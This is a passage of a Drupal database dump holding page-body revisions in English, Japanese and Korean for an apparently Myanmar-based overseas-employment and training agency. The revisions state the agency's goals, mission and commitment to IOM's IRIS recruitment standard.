('page', 0, 25, 287, 'ja', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_0.png\" data-align=\"left\" data-entity-uuid=\"0139e778-f800-4211-bab2-241a3161a010\" data-entity-type=\"file\" width=\"30.5%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902.png\" data-align=\"left\" data-entity-uuid=\"3b9565a8-e5ea-426b-927b-4ef6b8f0deb1\" data-entity-type=\"file\" width=\"30.39%\"><p class=\"MsoNormal\"><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 287, 'ko', 0, '<img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121922_2.png\" data-align=\"left\" data-entity-uuid=\"9f6e037e-9017-4275-8d18-3b626f1015e7\" data-entity-type=\"file\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><img src=\"/sites/default/files/inline-images/Screenshot%202023-07-31%20121902_1.png\" data-align=\"left\" data-entity-uuid=\"348bbcce-ca79-4848-842e-00f17e500578\" data-entity-type=\"file\"><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 위해.</strong><br><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 102, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 103, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 103, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 104, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 104, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 104, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 142, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p><p>The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</p>', '', 'full_html'),
('page', 0, 26, 142, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 142, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 163, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p><p>The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</p>', '', 'full_html'),
('page', 0, 26, 163, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 163, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 26, 164, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p><p>The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</p>', '', 'full_html'),
('page', 0, 26, 164, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 164, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 26, 168, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p><p>The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</p>', '', 'full_html'),
('page', 0, 26, 168, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>会社の目標</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">会社と労働者の間に損失がないように</span>International Organization for Migration (IOM)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">が定めた</span>International Recruitment Integrity System(IRIS)<span style=\"font-family:&quot;MS Mincho&quot;;mso-bidi-font-family:&quot;MS Mincho&quot;;\">に合った基準で管理しております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 168, 'ko', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>회사의</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>미래</strong></span><span style=\"font-size:14.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>비전</strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우리</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위대한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">현재</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상황과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라 외국에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미래의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">훈련과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"mso-fareast-language:KO;\">ASEAN&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">표준</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부합하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">만들기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되었습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용주와</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">목표는 최고의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인재를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">양성하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">발굴하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">것입니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p>', '', 'full_html'),
